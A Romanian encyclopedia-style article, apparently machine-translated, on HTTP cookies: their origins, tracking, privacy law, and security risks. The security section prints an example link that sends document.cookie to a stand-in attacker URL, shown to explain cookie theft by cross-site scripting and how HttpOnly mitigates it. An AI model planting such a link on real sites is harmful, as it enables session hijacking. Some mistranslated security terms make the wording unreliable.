in dEFINIŢIILE, Wiki

Cookie de internet: ce este? Definiție, origini, tipuri și confidențialitate

Care este rolul unui cookie, ce este acesta și care sunt tipurile de cookie-uri? 🍪

56.3k Vizualizări 384 Voturi

Cookie de internet: ce este? Definiție, origini, tipuri și confidențialitate
Cookie de internet: ce este? Definiție, origini, tipuri și confidențialitate

Un cookie sau cookie web (Sau prăjitură, prescurtat ca martor în Quebec) este definit de protocolul de comunicare HTTP ca fiind o secvență de informații trimise de un server HTTP către un client HTTP, pe care acesta din urmă le returnează de fiecare dată când același server HTTP este interogat în anumite condiții.

Cookie-ul este echivalentul unui fișier text mic stocat pe terminal al utilizatorului de internet. Exista de mai bine de 20 de ani, acestea permit dezvoltatorilor de site-uri web să stocheze datele utilizatorilor pentru a le facilita navigarea și a permite anumite funcționalități. Cookie-urile au fost întotdeauna mai mult sau mai puțin controversate, deoarece conțin informații personale reziduale care pot fi potențial exploatate de terți.

Este trimis ca antet HTTP de către serverul web către browserul web care îl returnează neschimbat de fiecare dată când accesează serverul. Un cookie poate fi folosit pentru o autentificare, o sesiune (întreținerea de stat), iar pentru stocați informații specifice despre utilizator, cum ar fi preferințele site-ului sau conținutul unui coș de cumpărături electronic. Termenul cookie este derivat din prăjitură magică, un concept binecunoscut în calculul UNIX, care a inspirat ideea și numele cookie-urilor de browser. Există câteva alternative la cookie-uri, fiecare cu propriile utilizări, avantaje și dezavantaje.

Fiind simple fișiere text, cookie-urile nu sunt executabile. Ei nu sunt nici spyware, nici viruși, deși cookie-urile de pe unele site-uri sunt detectate de multe programe antivirus deoarece permit utilizatorilor să fie urmăriți atunci când vizitează mai multe site-uri. 

Majoritatea browserelor moderne permit utilizatorilor decideți dacă acceptați sau respingeți cookie-urile. Utilizatorii pot, de asemenea alegeți cât timp sunt stocate cookie-urile. Cu toate acestea, respingerea completă a cookie-urilor face unele site-uri inutilizabile. De exemplu, stocați coșuri de cumpărături sau site-uri care necesită autentificare folosind acreditări (nume de utilizator și parolă).

Cuprins

Istoric

Termenul fursec derivă din termenul englezesc prăjitură magică, care este un pachet de date pe care un program le primește și le returnează neschimbat. Cookie-urile erau deja folosite în IT când Lou Montulli am avut ideea de a le folosi în comunicațiile web în iunie 1994. În acel moment, el era angajat de Netscape Communications, care dezvoltase o aplicație de comerț electronic pentru un client. Cookie-urile au oferit o soluție la problema fiabilității implementării coșului de cumpărături virtual al unui magazin.

John Giannandrea și Lou Montulli au scris prima specificație pentru cookie-uri Netscape în același an. Versiunea 0.9 beta a Mosaic Netscape, lansată pe 13 octombrie 1994, integrată tehnologie cookie (vezi postarea). Prima utilizare (neexperimentală) a cookie-urilor a fost pentru a determina dacă vizitatorii site-ului Netscape au vizitat site-ul înainte. Montulli a depus o cerere de brevet pentru tehnologia cookie-urilor în 1995, iar brevetul american 5774670 a fost acordat. acordat în 1998.

După ce au fost implementate în Netscape 0.9 beta în 1994, cookie-urile au fost integrate în Internet Explorer 2, lansat în octombrie 1995.

Introducerea cookie-urilor nu a fost încă cunoscută pe scară largă publicului. În special, cookie-urile au fost acceptate implicit în setările browserului, iar utilizatorii nu au fost informați despre prezența lor. Unii oameni erau conștienți de existența cookie-urilor în jurul primului trimestru al anului 1995, dar publicul larg și-a luat existența abia după ce Financial Times a publicat un articol pe 12 februarie 1996. În același an, cookie-urile au primit multă atenție mass-media. din cauza posibilelor încălcări ale vieții private. Subiectul cookie-urilor a fost discutat în două consultări ale Comisiei Federale Americane pentru Comerț în 1996 și 1997.

Dezvoltarea specificației oficiale pentru cookie-uri era deja în curs. Primele discuții despre specificația oficială au avut loc în aprilie 1995 pe lista de corespondență www-talk. A fost format un grup de lucru special IETF. Două propuneri alternative pentru introducerea tranzacțiilor de stat în HTTP au fost propuse de Brian Behlendorf și, respectiv, David Kristol, dar grupul, condus de însuși Kristol, a decis să folosească specificația Netscape ca punct de plecare. În februarie 1996, grupul de lucru a stabilit că cookie-urile de la terți reprezentau o amenințare semnificativă la adresa vieții private. Specificația produsă de grup a fost în cele din urmă publicată ca RFC 2109.

De la sfârșitul anului 2014, vedem un banner despre cookie-uri pe multe site-uri. Există cel puțin o extensie de browser care permite bannerul nu este afișat.

Tipuri de cookie-uri și utilizări

Managementul sesiunii

Cookie-urile pot fi folosite pentru a menține datele utilizatorului în timpul navigării, dar și în timpul vizitelor multiple. Cookie-urile au fost introduse pentru a oferi un mijloc de implementare a coșurilor de cumpărături electronice, un dispozitiv virtual în care utilizatorul poate acumula articolele pe care dorește să le cumpere în timp ce navighează pe site.

În zilele noastre, aplicațiile precum cărucioarele de cumpărături stochează în schimb lista de articole dintr-o bază de date pe un server, ceea ce este de preferat; decât salvarea lor în cookie-ul în sine. Serverul web trimite un cookie care conține un ID unic de sesiune. Browserul web returnează apoi acest ID de sesiune la fiecare solicitare ulterioară, iar articolele din coș sunt salvate și asociate cu același ID de sesiune unic.

Utilizarea frecventă a cookie-urilor este utilă pentru autentificarea pe un site folosind acreditările. Pe scurt, serverul web trimite mai întâi un cookie care conține un ID unic de sesiune. Apoi utilizatorii își oferă acreditările (de obicei, un nume de utilizator și o parolă). Aplicația web autentifică apoi sesiunea și permite utilizatorului să acceseze serviciul.

personalizare

Cookie-urile pot fi folosite pentru a reține informații despre utilizatorul unui site, pentru a-i arăta pe viitor conținut adecvat. De exemplu, un server web poate trimite un cookie care să conțină ultimul nume de utilizator utilizat pentru a vă conecta la acel site web, astfel încât acel nume de utilizator să poată fi pre-populat la vizitele viitoare.

Multe site-uri web folosesc cookie-uri pentru personalizare în funcție de preferințele utilizatorului. Utilizatorii își selectează preferințele într-un formular și le trimit serverului. Serverul codifică preferințele într-un cookie și îl trimite înapoi în browser. Ulterior, de fiecare dată când utilizatorul accesează o pagină a acestui site, browserul returnează cookie-ul și deci lista de preferințe; serverul poate personaliza apoi pagina în funcție de preferințele utilizatorului. De exemplu, site-ul Wikipedia permite utilizatorilor săi să aleagă skinul site-ului pe care îl preferă. Motorul de căutare Google permite utilizatorilor săi (chiar dacă nu sunt înregistrați) să aleagă numărul de rezultate pe care doresc să le vadă pe fiecare pagină de rezultate.

Urmărire

Cookie-urile de urmărire sunt folosite pentru a urmări obiceiurile de navigare ale utilizatorilor de internet. Acest lucru se poate face, de asemenea, parțial prin utilizarea adresei IP a computerului care face o solicitare pentru o pagină sau prin utilizarea antetului HTTP „referitor” pe care clientul îl trimite la fiecare solicitare, dar cookie-urile permit o precizie mai mare. Acest lucru se poate face ca în exemplul următor:

  1. Dacă utilizatorul apelează o pagină de pe un site, iar cererea nu conține un cookie, serverul presupune că aceasta este prima pagină vizitată de utilizator. Serverul creează apoi un șir aleator și îl trimite browserului împreună cu pagina solicitată.
  2. Din acest moment, cookie-ul va fi trimis automat de către browser de fiecare dată când este apelată o nouă pagină a site-ului. Serverul va trimite pagina ca de obicei, dar va înregistra și adresa URL a paginii apelate, data, ora solicitării și cookie-ul într-un fișier jurnal.

Privind fișierul jurnal, este apoi posibil să vedeți ce pagini a vizitat utilizatorul și în ce ordine. De exemplu, dacă fișierul conține câteva solicitări făcute folosind cookie-ul id=abc, aceasta poate stabili că toate aceste solicitări provin de la același utilizator. URL-ul solicitat, data și ora asociate solicitărilor permit urmărirea navigării utilizatorului.

Cookie-urile terță parte și semnalizatoarele web, explicate mai jos, permit în plus urmărirea pe diferite site-uri. Urmărirea unui singur site este utilizată în general în scopuri statistice. În schimb, urmărirea pe diferite site-uri folosind cookie-uri terță parte este, în general, utilizată de companiile de publicitate pentru a produce profiluri anonime de utilizator (care sunt apoi folosite pentru a determina ce reclame ar trebui să fie afișate utilizatorului, precum și pentru a-i trimite e-mailuri corespunzătoare acestor reclame - SPAM ).

Cookie-urile de urmărire reprezintă un risc de invazie a confidențialității utilizatorilor, dar pot fi șterse cu ușurință. Majoritatea browserelor moderne includ o opțiune de ștergere automată a cookie-urilor persistente la închiderea aplicației.

Cookie-uri de la terți

Imaginile și alte obiecte conținute într-o pagină web pot locui pe servere diferite de cel care găzduiește pagina. Pentru a afișa pagina, browserul descarcă toate aceste obiecte. Majoritatea site-urilor web conțin informații din surse diferite. De exemplu, dacă introduceți www.example.com în browser, vor exista adesea obiecte sau reclame pe o parte a paginii care provin din surse diferite, adică dintr-un domeniu diferit de www. .example.com. Cookie-urile „prime” sunt cookie-uri care sunt setate de domeniul listat în bara de adrese a browserului. Cookie-urile de la terți sunt setate de unul dintre obiectele paginii care provine dintr-un domeniu diferit.

În mod implicit, browserele precum Mozilla Firefox, Microsoft Internet Explorer și Opera acceptă cookie-uri de la terți, dar utilizatorii pot modifica setările din opțiunile browserului pentru a le bloca. Nu există niciun risc de securitate inerent cookie-urilor terță parte care permit funcționalitatea web, cu toate acestea, acestea sunt utilizate și pentru a urmări utilizatorii. de la site la site.

Instrumente precum Ghostery disponibile pentru toate browserele, inclusiv Google Chrome, pot bloca schimburile între terți.

Împletire

O posibilă interacțiune între un browser web și serverul care găzduiește pagina web. Serverul trimite un cookie către browser, iar browserul îl trimite înapoi atunci când apelează o altă pagină.
O posibilă interacțiune între un browser web și serverul care găzduiește pagina web. Serverul trimite un cookie către browser, iar browserul îl trimite înapoi atunci când apelează o altă pagină.

Cookie-urile sunt mici fragmente de date trimise de serverul web către browser. Browserul le returnează neschimbate la server, introducând starea (memoria evenimentelor trecute) în tranzacția HTTP, altfel fără stat. Fără cookie-uri, fiecare preluare a unei pagini web sau a unei componente a unei pagini web este un eveniment izolat, independent de alte solicitări făcute aceluiași site. Pe lângă faptul că pot fi setate de serverul web, cookie-urile pot fi setate și prin limbaje de scripting, cum ar fi JavaScript, dacă sunt acceptate și autorizate de browser.

Specificația oficială a modulelor cookie sugerează că browserele ar trebui să poată salva și retrimite un număr minim de module cookie. Mai exact, un browser ar trebui să poată stoca cel puțin 300 de cookie-uri a câte patru kiloocteți fiecare și cel puțin 20 de cookie-uri pentru un singur server sau domeniu.

Conform secțiunii 3.1 din RFC 2965, numele cookie-urilor nu fac distincție între majuscule și minuscule.

Un cookie poate specifica data expirării acestuia, caz în care cookie-ul va fi șters la această dată. Dacă cookie-ul nu specifică o dată de expirare, cookie-ul este șters imediat ce utilizatorul părăsește browserul. Prin urmare, specificarea unei date de expirare este o modalitate de a face cookie-ul să supraviețuiască prin mai multe sesiuni. Din acest motiv, se spune că cookie-urile cu o dată de expirare sunt persistent. Un exemplu de aplicație: un site de vânzare cu amănuntul poate folosi cookie-uri persistente pentru a înregistra articolele pe care utilizatorii le-au plasat în coșul de cumpărături (în realitate, cookie-ul s-ar putea referi la o intrare salvată într-o bază de date de pe site-ul de vânzare, și nu în computerul dvs.) . Prin acest mijloc, dacă utilizatorii își părăsesc browserul fără să facă o achiziție și revin la acesta mai târziu, ei vor putea găsi din nou articolele în coș. Dacă aceste cookie-uri nu dădeau o dată de expirare, acestea expirau la închiderea browserului, iar informațiile despre conținutul coșului s-ar pierde.

Cookie-urile pot fi limitate la un anumit domeniu, subdomeniu sau cale de pe serverul care le-a creat.

Transferul paginilor web se face folosind protocolul HTTP (HyperText Transfer Protocol). Ignorând cookie-urile, browserele apelează o pagină de pe serverele web trimițându-le, în general, un scurt text numit Solicitare HTTP. De exemplu, pentru a accesa pagina www.example.org/index.html, browserele se conectează la serverul www.example.org și trimit o solicitare care arată astfel:

GET /index.html HTTP/1.1Host: www.example.org
navigatorserveur

Serverul raspunde prin trimiterea paginii solicitate, precedata de un text asemanator, intregul fiind apelat Răspuns HTTP. Acest pachet poate conține linii care indică browserului să stocheze cookie-uri:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(pagina HTML)
navigatorserveur

Serverul trimite doar linia Set-Cookie, dacă serverul dorește ca browserul să stocheze un cookie. Set-Cookie este o solicitare pentru browser pentru a stoca șirul nume=valoare și a-l returna în toate cererile viitoare către server. Dacă browserul acceptă cookie-uri și cookie-urile sunt activate în opțiunile browserului, cookie-ul va fi inclus în toate solicitările ulterioare făcute către același server. De exemplu, browserul apelează pagina www.example.org/news.html trimițând următoarea solicitare către serverul www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navigatorserveur

Aceasta este o solicitare pentru o altă pagină de pe același server și diferă de prima de mai sus deoarece conține un șir pe care serverul l-a trimis anterior browserului. Datorită acestui mijloc, serverul știe că această solicitare este legată de cea anterioară. Serverul răspunde prin trimiterea paginii apelate și, de asemenea, prin adăugarea altor cookie-uri la aceasta.

Valoarea cookie-ului poate fi modificată de către server prin trimiterea unei noi linii Set-Cookie: name=new_value ca răspuns la pagina apelată. Browserul înlocuiește apoi valoarea veche cu cea nouă.

Linia Set-Cookie este de obicei creată de un program CGI sau alt limbaj de scripting, nu de serverul HTTP. Serverul HTTP (exemplu: Apache) va transmite doar rezultatul programului (un document precedat de antetul care conține cookie-urile) către browser.

Cookie-urile pot fi setate și prin JavaScript sau alte limbi similare care rulează în browser, adică pe partea clientului, mai degrabă decât pe partea serverului. În JavaScript, obiectul document.cookie este folosit în acest scop. De exemplu, instrucțiunea document.cookie = "temperature=20" creează un cookie numit "temperature" și cu o valoare de 20.

Exemplu de răspuns HTTP de la google.com, care setează un cookie cu atribute.
Exemplu de răspuns HTTP de la google.com, care setează un cookie cu atribute.

Pe lângă perechea nume/valoare, un cookie poate conține și o dată de expirare, o cale, un nume de domeniu și tipul de conexiune dorit, adică normală sau criptată. RFC 2965 definește, de asemenea, că cookie-urile trebuie să aibă un număr de versiune obligatoriu, dar acesta este în general omis. Aceste părți de date urmează perechea name=new_value și sunt separate prin punct și virgulă. De exemplu, un cookie poate fi creat de către server trimițând o linie Set-Cookie: name=new_value; expiră=data; cale=/; domeniu=.example.org.

Cookie-urile expiră și apoi nu sunt trimise de browser către server în următoarele situații:

  • Când browserul este închis, dacă cookie-ul nu este persistent.
  • Când data de expirare a cookie-urilor a trecut.
  • Când data de expirare a cookie-urilor este schimbată (de către server sau script) la o dată din trecut.
  • Când browserul șterge cookie-ul la solicitarea utilizatorului.

A treia situație permite serverelor sau scripturilor să șteargă în mod explicit un cookie. Rețineți că este posibil cu browserul web Google Chrome să cunoașteți data de expirare a unui anumit cookie accesând setările de conținut. Un cookie salvat pe un computer poate rămâne acolo câteva decenii dacă nu este luată nicio procedură pentru a-l șterge.

Stereotipuri

De la introducerea lor pe Internet, multe idei despre cookie-uri au circulat pe internet și în mass-media. În 1998, CIAC, o echipă de monitorizare a incidentelor informatice a Departamentului de Energie al Statelor Unite, a stabilit că vulnerabilitățile de securitate ale cookie-urilor erau „esențial inexistente” și a explicat că „informațiile despre originea vizitelor dvs. și detaliile paginilor web pe care le-ați vizitat. există deja în fișierele jurnal ale serverelor web”. În 2005, Jupiter Research a publicat rezultatele unui studiu, în care un procent semnificativ de respondenți au considerat următoarele afirmații:

  • Cookie-urile sunt ca virus, acestea infectează hard disk-urile utilizatorilor.
  • Se generează cookie-uri pop-up.
  • Cookie-urile sunt folosite pentru a trimite spam-.
  • Cookie-urile sunt folosite doar pentru publicitate.

Cookie-urile nu pot șterge sau citi informații de pe computerul utilizatorului. Cu toate acestea, cookie-urile fac posibilă detectarea paginilor web vizitate de un utilizator pe un anumit site sau set de site-uri. Aceste informații pot fi colectate într-un profil de utilizator care poate fi folosit sau revândut terților, ceea ce poate pune probleme serioase de confidențialitate. Unele profiluri sunt anonime, în sensul că nu conțin informații personale, dar chiar și astfel de profiluri pot fi discutabile.

Potrivit aceluiași studiu, un procent mare de utilizatori de internet nu știu cum să ștergă cookie-urile. Unul dintre motivele pentru care oamenii nu au încredere în cookie-uri este că unele site-uri au abuzat de aspectul de identificare personală al cookie-urilor și au partajat aceste informații cu alte surse. Un procent mare de publicitate direcționată și e-mailuri nesolicitate, considerate spam, provine din informațiile obținute din cookie-urile de urmărire.

Setări browser

Majoritatea browserelor acceptă cookie-uri și permit utilizatorului să le dezactiveze. Cele mai comune opțiuni sunt:

  • Activați sau dezactivați complet cookie-urile, astfel încât acestea să fie acceptate sau blocate în mod constant.
  • Permite utilizatorului să vadă cookie-urile active într-o pagină dată, introducând javascript: alert(document.cookie) în bara de adrese a browserului. Unele browsere încorporează un manager de cookie-uri pentru utilizator care poate vizualiza și șterge selectiv cookie-urile stocate în prezent de browser.

Majoritatea browserelor permit, de asemenea, ștergerea completă a datelor personale care includ cookie-uri. Există și module suplimentare pentru a controla permisiunile cookie-urilor.

Confidențialitate și cookie-uri de la terți

În acest exemplu fictiv, o companie de publicitate a plasat bannere pe două site-uri web. Prin găzduirea bannerelor pe serverele sale și prin utilizarea cookie-urilor terților, compania de publicitate este capabilă să urmărească navigarea utilizatorului prin aceste două site-uri.

Cookie-urile au implicații importante pentru confidențialitatea și anonimatul utilizatorilor web. Deși cookie-urile sunt trimise înapoi doar către serverul care le-a setat sau către un server aparținând aceluiași domeniu de Internet, o pagină web poate conține totuși imagini sau alte componente stocate pe servere aparținând altor domenii. Cookie-urile care sunt setate în timpul recuperării acestor componente externe sunt denumite cookie-uri de la terți. Aceasta include cookie-uri din ferestre pop-up nedorite.

Companiile de publicitate folosesc cookie-uri terțe pentru a urmări utilizatorii pe diferitele site-uri pe care le vizitează. În special, o companie de publicitate poate urmări un utilizator pe toate paginile în care a plasat imagini publicitare sau un pixel de urmărire. Cunoașterea paginilor vizitate de utilizator permite companiei de publicitate să vizeze preferințele de publicitate ale utilizatorului.

Capacitatea de a crea un profil de utilizator este considerată de unii ca fiind o invazie a confidențialității, mai ales atunci când urmărirea se face pe diferite domenii folosind cookie-uri terțe. Din acest motiv, unele țări au legislație privind cookie-urile.

Guvernul Statelor Unite a implementat reguli stricte privind plasarea cookie-urilor în 2000, după ce s-a dezvăluit că Biroul pentru Politica în Droguri de la Casa Albă folosea cookie-uri pentru a urmări computerele utilizatorilor care vizionează reclame online pentru medicamente. În 2002, activistul pentru confidențialitate Daniel Brandt a descoperit că CIA a lăsat cookie-uri persistente pe computerele care i-au vizitat site-urile web. Odată informată despre această încălcare, CIA a declarat că aceste cookie-uri nu au fost trimise intenționat și a încetat să le seteze. Pe 25 decembrie 2005, Brandt a descoperit că Agenția Națională de Securitate (NSA) a lăsat două cookie-uri persistente pe computerele vizitatorilor din cauza unei actualizări de software. După ce a fost notificată, NSA a dezactivat imediat cookie-urile.

În Regatul Unit, Legea cookie-urilor „, intrat în vigoare la 25 mai 2012, obligă site-urile să-și declare intențiile, permițând astfel utilizatorilor să aleagă dacă vor să lase sau nu urme ale trecerii lor pe Internet. Ele pot fi astfel protejate de direcționarea publicității. In orice caz, conform The Guardian, consimțământul utilizatorilor de internet nu este neapărat explicit; au fost aduse modificări la termenii consimțământului utilizatorului, făcându-l astfel subînțeles.

Directiva 2002/58 privind confidențialitatea

Directiva 202/58 privind confidențialitatea și comunicațiile electronice, conține reguli privind utilizarea cookie-urilor. În special, articolul 5, paragraful 3 din prezenta directivă impune ca stocarea datelor (cum ar fi cookie-urile) în computerul utilizatorului se poate face numai dacă:

  • utilizatorul este informat despre modul în care sunt utilizate datele;
  • utilizatorului i se oferă opțiunea de a refuza această operațiune de stocare. Totuși, acest articol mai precizează că stocarea datelor din motive tehnice este exceptată de la această lege.

Cu toate acestea, care urma să fie pusă în aplicare din octombrie 2003, directiva a fost pusă în practică doar foarte imperfect, conform unui raport din decembrie 2004, care a subliniat, de asemenea, că anumite state membre (Slovacia, Letonia, Grecia, Belgia și Luxemburg) nu au transpus încă directivă în dreptul intern.

Potrivit avizului G29 din 2010, această directivă, care condiționează în special utilizarea cookie-urilor în scopuri de publicitate comportamentală, cu privire la consimțământul explicit al utilizatorului de internet rămâne foarte prost aplicată. De altfel, majoritatea site-urilor fac acest lucru într-un mod care nu respectă directiva, limitându-se la un simplu „banner” care informează despre utilizarea „cookie-urilor” fără a oferi informații despre utilizări, fără a face diferența între cookie-uri „tehnice”. cookie-uri de „urmărire”, nici să ofere o alegere reală utilizatorului care dorește să mențină cookie-uri tehnice (cum ar fi cookie-uri de gestionare a coșului de cumpărături) și să refuze cookie-urile de „urmărire”. De fapt, multe site-uri nu funcționează corect dacă cookie-urile sunt refuzate, ceea ce nu respectă directiva 2002/58 sau directiva 95/46 (Protecția datelor cu caracter personal).

Directiva 2009/136 / CE

Acest material a fost actualizat prin Directiva 2009/136/CE din 25 noiembrie 2009 care prevede că „stocarea informațiilor, sau obținerea accesului la informații deja stocate, în echipamentul terminal al unui abonat sau utilizator este permisă numai cu condiția ca abonatul sau utilizatorul și-a dat consimțământul, după ce a primit, în conformitate cu Directiva 95/46/CE, informații clare și complete, între ceilalți cu privire la scopurile prelucrării”. Prin urmare, noua directivă întărește obligațiile înainte de a plasa cookie-uri pe computerul utilizatorului de internet.

În considerentele preliminare ale directivei, legiuitorul european precizează însă: „Acolo unde este posibil și eficient din punct de vedere tehnic, în conformitate cu prevederile relevante ale Directivei 95/46/CE, consimțământul utilizatorului cu privire la prelucrare poate fi exprimat prin intermediul utilizarea setărilor adecvate ale unui browser sau altei aplicații”. Dar, de fapt, niciun browser până în prezent nu face posibilă disocierea cookie-urilor tehnice esențiale de cele opționale care ar trebui lăsate la alegerea utilizatorului.

Această nouă directivă a fost transpusă de parlamentari belgieni în iulie 2012. Un studiu din 2014 arată că chiar și parlamentarii se luptă să aplice constrângerile directivei.

P3P

Specificația P3P include capacitatea unui server de a stabili o politică de confidențialitate, care definește ce fel de informații colectează și în ce scop. Aceste politici includ (dar nu se limitează la) utilizarea informațiilor colectate folosind cookie-uri. Conform definițiilor P3P, un browser poate accepta sau respinge cookie-urile comparând politicile de confidențialitate cu preferințele utilizatorului sau întrebând utilizatorul, prezentând declarația de confidențialitate a politicii de confidențialitate declarată de server.

Multe browsere, inclusiv Apple Safari și Microsoft Internet Explorer versiunile 6 și 7, acceptă P3P, ceea ce permite browserului să determine dacă acceptă stocarea cookie-urilor de la terți. Browserul Opera permite utilizatorilor să refuze cookie-urile de la terți și să creeze un profil de securitate global și specific pentru domeniile de Internet. Mozilla Firefox versiunea 2 a renunțat la suportul P3P, dar l-a reinstalat în versiunea 3.

Cookie-urile de la terți pot fi blocate de majoritatea browserelor pentru a crește confidențialitatea și a reduce urmărirea anunțurilor, fără a afecta negativ experiența web a utilizatorului. Multe agenții de publicitate oferă o opțiune a renunța la publicitate direcționată, prin setarea în browser a unui cookie generic care dezactivează această direcționare, dar o astfel de soluție nu este practic eficientă, atunci când este respectată, deoarece acest cookie generic este șters de îndată ce utilizatorul șterge aceste cookie-uri ceea ce anulează optul afară decizia.

Dezavantajele cookie-urilor

Pe lângă problemele de confidențialitate, cookie-urile au și unele dezavantaje tehnice. În special, ele nu identifică întotdeauna cu exactitate utilizatorii, pot încetini performanța site-ului atunci când sunt în număr mare, pot fi folosite pentru atacuri de securitate și intră în conflict cu transferul de stat reprezentativ, stilul arhitectural al software-ului.

Identificare imprecisă

Dacă pe un computer este utilizat mai mult de un browser, în fiecare dintre ele există întotdeauna o unitate de stocare separată pentru cookie-uri. Prin urmare, cookie-urile nu identifică o persoană, ci o combinație între un cont de utilizator, un computer și un browser web. Astfel, oricine poate folosi aceste conturi, computere sau browsere care au panoplie de cookie-uri. În mod similar, cookie-urile nu fac diferența între mai mulți utilizatori care partajează același cont de utilizator, computer și browser, cum ar fi în „cafele internet” sau în orice loc care oferă acces gratuit la resursele computerului.

Dar, în practică, această afirmație se dovedește a fi greșită în majoritatea cazurilor, deoarece astăzi un computer „personal” (sau un smartphone, sau o tabletă, ceea ce este mai rău) este folosit în principal de un singur individ. Aceasta înseamnă că viza o anumită persoană și prin volumul de informații colectate ajungeți la o direcționare personalizată chiar dacă persoana nu este „și anume” identificată.

Un cookie poate fi furat de un alt computer din rețea.

În timpul funcționării normale, cookie-urile sunt trimise înapoi între server (sau un grup de servere din același domeniu) și browserul computerului utilizatorului. Deoarece cookie-urile pot conține informații sensibile (nume de utilizator, o parolă folosită pentru autentificare etc.), valorile acestora nu ar trebui să fie accesibile altor computere. Furtul cookie-urilor este un act de interceptare a cookie-urilor de către o terță parte neautorizată.

Cookie-urile pot fi furate printr-un sniffer de pachete într-un atac numit deturnarea sesiunii. Traficul de pe net poate fi interceptat și citit de alte computere decât cele care trimit și primesc (în special pe spațiul Wi-Fi public necriptat). Acest trafic include cookie-uri trimise peste sesiuni folosind protocolul HTTP simplu. Atunci când traficul de rețea nu este criptat, utilizatorii rău-intenționați pot citi, astfel, comunicările altor utilizatori din rețea folosind „packet sniffers”.

Această problemă poate fi depășită prin criptarea conexiunii dintre computerul utilizatorului și server folosind protocolul HTTPS. Un server poate specifica un steag sigur în timp ce setați un cookie; browserul îl va trimite doar printr-o linie sigură, cum ar fi o conexiune SSL.

Cu toate acestea, multe site-uri, deși folosesc comunicarea criptată HTTPS pentru autentificarea utilizatorului (adică pagina de autentificare), ulterior trimit cookie-uri de sesiune și alte date în mod normal, prin conexiuni HTTP necriptate din motive de eficiență. Atacatorii pot astfel intercepta cookie-urile altor utilizatori și uzurpa identitatea acestora pe site-uri adecvate sau le pot folosi în atacurile cookie.

Scripting în site: un cookie care ar trebui schimbat doar între server și client este trimis către o altă terță parte.

O altă modalitate de a fura cookie-uri este să scripturi site-uri și ca browserul însuși să trimită cookie-uri către servere rău intenționate care nu le primesc niciodată. Browserele moderne permit executarea părților de cod căutate de pe server. Dacă cookie-urile sunt accesate în timpul rulării, valorile acestora pot fi comunicate într-o anumită formă serverelor care nu ar trebui să le acceseze. Criptarea cookie-urilor înainte ca acestea să fie trimise în rețea nu ajută la contracararea atacului.

Acest tip de scripting in-site este folosit de obicei de atacatori pe site-uri care permit utilizatorilor să posteze conținut HTML. Prin integrarea unei părți a codului compatibil în contribuția HTML, un atacator poate primi cookie-uri de la alți utilizatori. Cunoașterea acestor cookie-uri poate fi folosită prin conectarea la același site folosind cookie-urile furate, fiind astfel recunoscut drept utilizatorul ale cărui cookie-uri au fost furate.

O modalitate de a preveni astfel de atacuri este să folosești steag-ul HttpOnly; este o opțiune, introdusă începând cu versiunea 6 a Internet Explorer în PHP începând cu versiunea 5.2.0, care este planificată să facă cookie-ul inaccesibil pentru client aproape de script. Cu toate acestea, dezvoltatorii web ar trebui să țină cont de acest lucru în dezvoltarea site-ului lor, astfel încât să fie imuni la scripting pe site.

O altă amenințare de securitate utilizată este fabricarea cererii în site.

Specificația tehnică oficială permite ca cookie-urile să fie returnate numai către serverele din domeniul din care provin. Cu toate acestea, valoarea cookie-urilor poate fi trimisă către alte servere folosind alte mijloace decât anteturile cookie-urilor.

În special, limbajele de scripting precum JavaScript au în general permisiunea de a accesa valorile cookie și sunt capabile să trimită valori arbitrare către orice server de pe Internet. Această capacitate de scriptare este utilizată de pe site-uri web, permițând utilizatorilor să posteze conținut HTML pentru a fi vizualizat de alți utilizatori.

De exemplu, un atacator care operează pe domeniul example.com ar putea posta un comentariu care să conțină următorul link care indică către un blog popular pe care altfel nu îl controlează:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Când un alt utilizator face clic pe acest link, browserul execută partea de atribut onclick a codului, astfel încât înlocuiește șirul document.cookie cu lista de cookie-uri de utilizator care sunt active pentru această pagină. Prin urmare, această listă de cookie-uri este trimisă către serverul example.com și, prin urmare, atacatorul poate colecta cookie-urile acestui utilizator.

Acest tip de atac este greu de detectat din partea utilizatorului deoarece scriptul provine din același domeniu care a setat cookie-ul, iar operațiunea de trimitere a valorilor pare a fi autorizată de acel domeniu. Se consideră că este responsabilitatea administratorilor care operează acest tip de site să pună în aplicare restricții care împiedică publicarea codului rău intenționat.

Cookie-urile nu sunt direct vizibile pentru programele client, cum ar fi JavaScript, dacă au fost trimise cu semnalul HttpOnly. Din punctul de vedere al serverului, singura diferență este că în linia antetului Set-Cookie se adaugă un câmp nou care conține șirul HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Când browserul primește un astfel de cookie, se presupune că îl folosește în mod normal în următorul schimb HTTP, dar fără a-l face vizibil pentru scripturile executate pe partea clientului. Indicatorul HttpOnly nu face parte din nicio specificație tehnică oficială și nu este implementat în toate browserele. Rețineți că în prezent nu există nicio modalitate de a preveni citirea și scrierea cookie-urilor de sesiune prin metoda XMLHTTPRequest.

Modificarea conținutului: un atacator trimite un cookie invalid către un server, eventual realizat dintr-un cookie valid trimis de server.

De îndată ce cookie-urile trebuie să fie stocate și returnate neschimbate pe server, un atacator poate modifica valoarea cookie-urilor înainte ca acestea să fie trimise înapoi la server. De exemplu, dacă un cookie conține valoarea totală pe care utilizatorul trebuie să o plătească pentru articolele plasate în coșul de cumpărături al magazinului, modificarea acestei valori expune serverul la riscul de a taxa atacatorul mai puțin decât prețul de pornire. Procesul de modificare a valorii cookie-urilor este numit intoxicație cu fursecuri și poate fi folosit după furtul cookie-urilor pentru a face atacul persistent.

În metoda de înlocuire a cookie-urilor, atacatorul exploatează o eroare a browserului pentru a trimite un cookie nevalid către server.

Cu toate acestea, majoritatea site-urilor web stochează doar un ID de sesiune - un număr unic generat aleatoriu folosit pentru a identifica utilizatorul de sesiune - în cookie-ul în sine, în timp ce toate celelalte informații sunt stocate pe server. În acest caz, această problemă este în mare măsură rezolvată.

Se așteaptă ca fiecare site să aibă propriile cookie-uri, astfel încât un site nu ar trebui să poată modifica sau crea cookie-uri asociate cu un alt site. O defecțiune de securitate a browserului web poate permite site-urilor rău intenționate să încalce această regulă. Exploatarea unui astfel de defect este denumită în mod obișnuit ca gătit între locuri. Scopul unor astfel de atacuri poate fi furtul de identitate de sesiune.

Utilizatorii ar trebui să utilizeze cele mai recente versiuni ale browserelor web în care aceste vulnerabilități sunt practic eliminate.

Stare conflictuală între client și server

